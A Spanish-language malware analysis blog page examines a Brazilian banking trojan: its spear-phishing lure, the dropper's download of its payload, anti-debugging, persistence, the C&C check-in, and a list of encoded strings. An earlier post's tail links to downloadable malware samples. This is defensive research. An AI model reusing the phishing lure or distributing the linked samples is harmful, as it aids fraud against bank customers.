<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN6bCoXCet7rVHbjzF1cRLERyDdmePCrS8tEirqLvZUm1nXb-E1Skxzl2aSj67jJNZeT-1f1sQ8pYJR5T95LddZFgUtOaNDao4a5Gmv1k_Iwr4cI4LnJJYsEfPcxTsoB3X0ZonJHtoWJU/s1600/c%2526c.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN6bCoXCet7rVHbjzF1cRLERyDdmePCrS8tEirqLvZUm1nXb-E1Skxzl2aSj67jJNZeT-1f1sQ8pYJR5T95LddZFgUtOaNDao4a5Gmv1k_Iwr4cI4LnJJYsEfPcxTsoB3X0ZonJHtoWJU/s640/c%2526c.jpg" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-SHEIRHRngBQBXbGG4dRAJ8C6DM3FlfwUCSiNKPvmHUTAl3ParRr9EgcLjZLFmE5SCpX4MgPG6aQ11k_-4ChWKvVroqLRFFGua_E7C2YMxEdq-tVihlj9vdN4zyX_XPCsKee-7Aik15w/s1600/final.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="42" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-SHEIRHRngBQBXbGG4dRAJ8C6DM3FlfwUCSiNKPvmHUTAl3ParRr9EgcLjZLFmE5SCpX4MgPG6aQ11k_-4ChWKvVroqLRFFGua_E7C2YMxEdq-tVihlj9vdN4zyX_XPCsKee-7Aik15w/s640/final.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Esta amenaza se utiliza para controlar la pc de la victima, es posible subir y ejecutar otras amenaza como ser Ransomware.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: Arial, Helvetica, sans-serif;">Muestras: https://www.dropbox.com/s/9wyu52hn2itmqb9/malw%20-07-04-17-telefonica.7z?dl=0</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="background-color: white; color: #444444; font-family: arial, helvetica, sans-serif; font-size: 13px;">Es todo por el momento @Dkavalanche 2017</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="background-color: white; color: #14171a; font-family: "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;"><br /></span>
<span style="background-color: white; color: #14171a; font-family: "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;"><br /></span>
<span style="background-color: white; color: #14171a; font-family: "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;"><span id="goog_428227754"></span><span id="goog_428227755"></span><br /></span>
<span style="background-color: #f5f8fa; color: #14171a; font-family: "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;"><br /></span>
<span style="background-color: #f5f8fa; color: #14171a; font-family: "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;"><br /></span>
<span style="background-color: #f5f8fa; color: #14171a; font-family: "arial" , sans-serif; font-size: 14px; white-space: pre-wrap;"><span id="goog_363119376"></span><span id="goog_363119377"></span><br /></span>@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.com1tag:blogger.com,1999:blog-4220472203730425546.post-70982747606761755852017-03-31T10:55:00.001-07:002017-03-31T10:56:30.042-07:00<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Troyano Brasileño: Afecta a varias entidades Bancarias del Brasil.</span></b><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b>
<span style="font-family: "arial" , "helvetica" , sans-serif;">La amenaza llega bajo el siguiente spear phishing.</span><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white;"><b>Asunto: </b></span><span style="background-color: white; color: #333333; font-size: 21px;">Seu CPF/CNPJ Sera incluso no SPC/SERASA, Por falta de Pagamento. Protc.:2017-30656</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNjjRrsC8hdriKB27VItW2i9-VwTpDw27BxOcPwhyKWxtjMMNjZWnUCN0bUYh5kaa4jq4uwX4F2Fe8JAbWTjRnXzLADHcxnLKCxfXBbpVipggLBTE6zbJTBQxlqwvKJAFPH1eu2d6r_Z8/s1600/Clipboard01.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="288" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNjjRrsC8hdriKB27VItW2i9-VwTpDw27BxOcPwhyKWxtjMMNjZWnUCN0bUYh5kaa4jq4uwX4F2Fe8JAbWTjRnXzLADHcxnLKCxfXBbpVipggLBTE6zbJTBQxlqwvKJAFPH1eu2d6r_Z8/s400/Clipboard01.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">El link nos descarga un ZIP con un ejecutable.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9WVmKmfu2jbA45yOlUdRoGR826p5fgHAv_UUdK44HquWHHGIhIwDniAdZVvj-8sgiC-HeGHiGEntOB26DgWrdYGLOWs-oIsp4eZed-z5cjnU0a7e-ViDQkXRQl0BRcgfUJ34fr41suVw/s1600/Clipboard02.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9WVmKmfu2jbA45yOlUdRoGR826p5fgHAv_UUdK44HquWHHGIhIwDniAdZVvj-8sgiC-HeGHiGEntOB26DgWrdYGLOWs-oIsp4eZed-z5cjnU0a7e-ViDQkXRQl0BRcgfUJ34fr41suVw/s640/Clipboard02.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Icono de la aplicación,</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrUrT0WkJ8xJIBoYoI0_HiRNSZ3A-winKAmuiKA9a1VcAeeXk8hLHQpUE2QYiUydD0IrwkEEC6ktUoKoMA4x0Xniq9bEALHIzfJWQ6sfXWNan6doX0swYdrh7xUMsn_nY1n1zFUgaMCro/s1600/icono.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrUrT0WkJ8xJIBoYoI0_HiRNSZ3A-winKAmuiKA9a1VcAeeXk8hLHQpUE2QYiUydD0IrwkEEC6ktUoKoMA4x0Xniq9bEALHIzfJWQ6sfXWNan6doX0swYdrh7xUMsn_nY1n1zFUgaMCro/s320/icono.jpg" width="281" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmSxGpTosMtsXp5ESdHUE_shKIGhyphenhyphenKWdbKtsopVApXV_vZRnqg3-UQVS-ZnFKQR_XkqzuNNVAYwhAMpItzO70C9jgQzJK9DAFmhHEqd2C0b5MXyGqDqxgJG4Iu4keh-uAnt2qfjjbFw8I/s1600/Clipboard03.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="171" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmSxGpTosMtsXp5ESdHUE_shKIGhyphenhyphenKWdbKtsopVApXV_vZRnqg3-UQVS-ZnFKQR_XkqzuNNVAYwhAMpItzO70C9jgQzJK9DAFmhHEqd2C0b5MXyGqDqxgJG4Iu4keh-uAnt2qfjjbFw8I/s640/Clipboard03.jpg" width="640" /></a></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b><br /></b></span></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Analisis del dropper.</b></span></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Strings interesantes, podemos ver de donde se descarga el payload, y su pésimo método de ofuscación.</span></div>
<div class="" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiajqavdMdEtaQhs1fokxNkflCnsBsrUIkZIwvhc0fyleHRFvXEAHF3RG2xZTxvGDh9SNkHKNQGwdKMEv9e_2Wcb2vd1wLBiM4itnPPCzdRtPeY_9869BfcCJ7PX1otWXOFy6ajvFulrCs/s1600/05.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiajqavdMdEtaQhs1fokxNkflCnsBsrUIkZIwvhc0fyleHRFvXEAHF3RG2xZTxvGDh9SNkHKNQGwdKMEv9e_2Wcb2vd1wLBiM4itnPPCzdRtPeY_9869BfcCJ7PX1otWXOFy6ajvFulrCs/s640/05.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Proteccion básica anti-debugging</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg95serqLomPbt59N2d1V9lyb0RaWEjSGFdqBPd8pqw6qIAuaDkvZVhsS4vNi0J_wHj_AoraUk7iLUGk4AR_WOryM0w6UYddWfH2lEiUcvMFw3KZHyezxs7J3X3XWjzxYyYnMkeN21UxQc/s1600/05-b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg95serqLomPbt59N2d1V9lyb0RaWEjSGFdqBPd8pqw6qIAuaDkvZVhsS4vNi0J_wHj_AoraUk7iLUGk4AR_WOryM0w6UYddWfH2lEiUcvMFw3KZHyezxs7J3X3XWjzxYyYnMkeN21UxQc/s320/05-b.jpg" width="320" /></a></div>
<br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"> Llamada a la función para la descarga del payload.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggFq5LRj6L2TgRZxVRl4-KiiTHyH6Q1bXZJplZh7fri4MIV86Ak2CqulGwGKoPtdGVgMZVMcZJK-9WGH9-oPGRiQnt1AcGxioaW2Nuvhq_2-IcMDb9epsHh3iae_sB9xS1DaPVg7vkRwE/s1600/07.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="196" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggFq5LRj6L2TgRZxVRl4-KiiTHyH6Q1bXZJplZh7fri4MIV86Ak2CqulGwGKoPtdGVgMZVMcZJK-9WGH9-oPGRiQnt1AcGxioaW2Nuvhq_2-IcMDb9epsHh3iae_sB9xS1DaPVg7vkRwE/s400/07.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Aquí se puede ver el url del malware (lo habíamos visto antes en la parte de los strings que estaban muy mal ofuscados)</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">La extension del archivo es zip, pero no lo es, esta codificado, el downloader se encarga de decodificarlo en un .exe y ejecutarlo con ShellExecuteA</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZANrou9a6B44R_QhF05UD03ueuMrbUd8JyoCK6ihQpRTGNvLpN1zQQeJoOocPc9P8kxvwxoPox693g7glRP7jIbQIKF_5k7hzZX51YmicRUA4nruwKt7zTnJTyo4ZTfj5MkIFnQ8dI9A/s1600/08.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZANrou9a6B44R_QhF05UD03ueuMrbUd8JyoCK6ihQpRTGNvLpN1zQQeJoOocPc9P8kxvwxoPox693g7glRP7jIbQIKF_5k7hzZX51YmicRUA4nruwKt7zTnJTyo4ZTfj5MkIFnQ8dI9A/s1600/08.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb5mFDDbRKOYT7dfSoFeUcY20kqPnPmMD2YC5MHP-Tev-E9fqVPa2stgA5laZt3iyfIzSM0lLRXIh3hV68pISH7mOlgIr9ue6dUawaa9vi4_P7T_X7kKgOdivjnxQEhCywU2j7U9DjAEs/s1600/09.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="6" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb5mFDDbRKOYT7dfSoFeUcY20kqPnPmMD2YC5MHP-Tev-E9fqVPa2stgA5laZt3iyfIzSM0lLRXIh3hV68pISH7mOlgIr9ue6dUawaa9vi4_P7T_X7kKgOdivjnxQEhCywU2j7U9DjAEs/s320/09.jpg" width="320" /></a></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"> Ubicación en el sistema del archivo para luego ejecutarlo.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjENIwLabgJzrBnjdlrLxDsy3jezPPy36FUOd1r7EwOMkOYQUfXWfM8mVemp5hD8l3OHTAObvLNdq8PeDGjyJBPJlReeRfreOUlKsA6CATnrK-U9LzblcoXEGwSiPoh5LtZvk_04kU4sK8/s1600/10.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjENIwLabgJzrBnjdlrLxDsy3jezPPy36FUOd1r7EwOMkOYQUfXWfM8mVemp5hD8l3OHTAObvLNdq8PeDGjyJBPJlReeRfreOUlKsA6CATnrK-U9LzblcoXEGwSiPoh5LtZvk_04kU4sK8/s1600/10.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinoKxvBg8XuKg7i-YhvnajYGtBuAdt4IIvF8M22CFrlfmaUcjBdJAT7YjA0zfVw9gFwHIbzhUpIldVdQaK88fcJZUw5YaIrm1KR-URix_V0EHkOkfmzSNtFpQFggtHIQwCjKs9vlJSVdw/s1600/11.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEinoKxvBg8XuKg7i-YhvnajYGtBuAdt4IIvF8M22CFrlfmaUcjBdJAT7YjA0zfVw9gFwHIbzhUpIldVdQaK88fcJZUw5YaIrm1KR-URix_V0EHkOkfmzSNtFpQFggtHIQwCjKs9vlJSVdw/s1600/11.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOlurnC3jOHHmZYVNWgTR0R-5bYVL6ZOTPADMqtyc7gGJn0PJdBhMZdumSdfS7J19O6EYjyqf3xuC5PwXqgEZRq0xrYg7-tUQAdUvAdzq216mVE7SdRmeaIrSMZc18vvtSx8xffC0bob0/s1600/06.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgOlurnC3jOHHmZYVNWgTR0R-5bYVL6ZOTPADMqtyc7gGJn0PJdBhMZdumSdfS7J19O6EYjyqf3xuC5PwXqgEZRq0xrYg7-tUQAdUvAdzq216mVE7SdRmeaIrSMZc18vvtSx8xffC0bob0/s1600/06.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrCipas03Si_4aPvB70Px7zUCyMYfGnszieGgDs6q_RpJOMJGks7De50FwR72HDDB0sMP6nrsMgLAw2t_Dq8DQPS3mu8UH6fvejGRFIDITpt_9OwzFAqz4bVCFUAMYYKonezzBXSgSJ1M/s1600/15.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrCipas03Si_4aPvB70Px7zUCyMYfGnszieGgDs6q_RpJOMJGks7De50FwR72HDDB0sMP6nrsMgLAw2t_Dq8DQPS3mu8UH6fvejGRFIDITpt_9OwzFAqz4bVCFUAMYYKonezzBXSgSJ1M/s640/15.jpg" width="640" /></a></div>
<br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Llamada al c&c para reportar la infección.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1Kj1eRbtJwQaOMVbuffLKVGXOyTmouhzNKCkfhYrOxiOkZDXZTA15lhxKeDWF6ma8q4LAu6v1YSF8P7G1PZBLNbIzel0T9FiZs2xveBs0RHAiYLbXiWJiZfl4n66voauguDrxyNnf07M/s1600/13.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="627" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1Kj1eRbtJwQaOMVbuffLKVGXOyTmouhzNKCkfhYrOxiOkZDXZTA15lhxKeDWF6ma8q4LAu6v1YSF8P7G1PZBLNbIzel0T9FiZs2xveBs0RHAiYLbXiWJiZfl4n66voauguDrxyNnf07M/s640/13.jpg" width="640" /></a></div>
<br />
<br />
<br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Analisis del Payload</span></b><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Como vemos el archivo es un poco extenso 114 Mb</span><br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3frcIDQrA5y9JS_ZySH1p4zUXO4e0rLUaDnIHmkPIQ-0CSC5CGZ0QIavEYxDRzt8aieAX7y5iFu4Pqjf8WC3SwX0SjVAQnSjeeMbcvPsAJhGa9zVCGJu3HPxTT2CgCdSMfLb9A83Ihg8/s1600/icono2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3frcIDQrA5y9JS_ZySH1p4zUXO4e0rLUaDnIHmkPIQ-0CSC5CGZ0QIavEYxDRzt8aieAX7y5iFu4Pqjf8WC3SwX0SjVAQnSjeeMbcvPsAJhGa9zVCGJu3HPxTT2CgCdSMfLb9A83Ihg8/s320/icono2.jpg" width="269" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBxLW5-68vXyu0lamjSr_yXIMr7PZ9cYaSplCA3T_isS63fR64k7AujI15H9-UhK5T92VRmak83rmpiARM7l8vTqL6VT_A6Bt0Wmi-c_zgDm5ELQ5jjg80D322m7t1EHAzDp7YWY_M4KQ/s1600/vt2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBxLW5-68vXyu0lamjSr_yXIMr7PZ9cYaSplCA3T_isS63fR64k7AujI15H9-UhK5T92VRmak83rmpiARM7l8vTqL6VT_A6Bt0Wmi-c_zgDm5ELQ5jjg80D322m7t1EHAzDp7YWY_M4KQ/s640/vt2.jpg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://virustotal.com/es/file/63e335b50467c00bd6dec465f3c5de4c6d5c427a593247a38709d6588cb50a5a/analysis/1490982253/</span><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"> Persistencia en el sistema</span><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIDhQUmc1lapg24RovPKHmy94lpwxA82B3oxpz1jFK1T8h1YWCb1LzeIeb9g3o9rikkg6G1hH8fyPWxz6xDbNugVu6sQ7Aa1FVPbeCVt44sujUqEmyNg8s8_qxI5rnM6EMFDZVYXkFZU0/s1600/startup.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="38" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIDhQUmc1lapg24RovPKHmy94lpwxA82B3oxpz1jFK1T8h1YWCb1LzeIeb9g3o9rikkg6G1hH8fyPWxz6xDbNugVu6sQ7Aa1FVPbeCVt44sujUqEmyNg8s8_qxI5rnM6EMFDZVYXkFZU0/s640/startup.jpg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Existen cadenas codificadas</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 006833E8 <ansistring> '345AFA2ECD75DC3F9732A0'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683408 <ansistring> '45'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683414 <ansistring> '32AF24DA13B618BE1BB226B31EC60E389EF417BE1BC4001AC3035C'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683454 <ansistring> '46'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683460 <ansistring> 'BB18B56599FE'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683478 <ansistring> '47'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683484 <ansistring> 'E86EEB1CD672E266E072DC65F2256783D37AA7ED659F3953FF47'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 006834C4 <ansistring> '48'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 006834D0 <ansistring> '6CE16F99'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 006834E4 <ansistring> '070D49E90B494F89D774'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683504 <ansistring> '49'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683510 <ansistring> '4984C16085DD68FD54BA26BE15CDCF76EF5C'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 00683540 <ansistring> '50'</ansistring></span></div>
<div class="separator" style="clear: both;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: x-small;"> 0068354C <ansistring> '83DD7297A922AE2AA3329E3F938084FD011731AD28D0CA0D3899'</ansistring></span></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Podemos decodificarlas poniendo un BP en la dirección de memoria donde finaliza la rutina de desencripción </span><span style="font-family: "arial" , "helvetica" , sans-serif;">y verificar el valor devuelto en EDX</span></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCBojIDum6CDG7Wg374QiUltf6Wo7m_T-ioF98AFuP3i01l4q_KDg0TMnExuH9phpMdx1KHthc4ZItGxsqtlctpTjt89irDyk1ZunalLHELU2eIObBc_JU5ZJGFksAVFPZ37LN6fb1SkM/s1600/trusteer.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCBojIDum6CDG7Wg374QiUltf6Wo7m_T-ioF98AFuP3i01l4q_KDg0TMnExuH9phpMdx1KHthc4ZItGxsqtlctpTjt89irDyk1ZunalLHELU2eIObBc_JU5ZJGFksAVFPZ37LN6fb1SkM/s400/trusteer.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSoTK7dlYnopURCrV3zyNTYyvIm3I0ZEVZhrDer6mtq4e11U3qtfVZMjtMLTf8Cfi8Mp35xwCgFlKa61gOkCcbLF0XhY9dCUO5EwIIpk-SHqE3qPeUbpzEr8yt2vZUKcYVjQBOjX37p88/s1600/bk02.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSoTK7dlYnopURCrV3zyNTYyvIm3I0ZEVZhrDer6mtq4e11U3qtfVZMjtMLTf8Cfi8Mp35xwCgFlKa61gOkCcbLF0XhY9dCUO5EwIIpk-SHqE3qPeUbpzEr8yt2vZUKcYVjQBOjX37p88/s1600/bk02.jpg" /></a><br />
<br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">Nota: La rutina de codificación y decodificación fue explicada en otras entregas del blog.</span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT_YXc4AkuTK9VLi_Jp71_siEY9-4za6rTSpC41YKuQD1foX-0xJkBGNpQBng-d1Q3XrR5lClxEGXZSJASjtr6ZMyNqZurAcsMnz9kbhiednAztiR5AfJ9AYiWmxOGEkk21GLiq4ghigk/s1600/AVAST.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="54" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT_YXc4AkuTK9VLi_Jp71_siEY9-4za6rTSpC41YKuQD1foX-0xJkBGNpQBng-d1Q3XrR5lClxEGXZSJASjtr6ZMyNqZurAcsMnz9kbhiednAztiR5AfJ9AYiWmxOGEkk21GLiq4ghigk/s400/AVAST.jpg" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
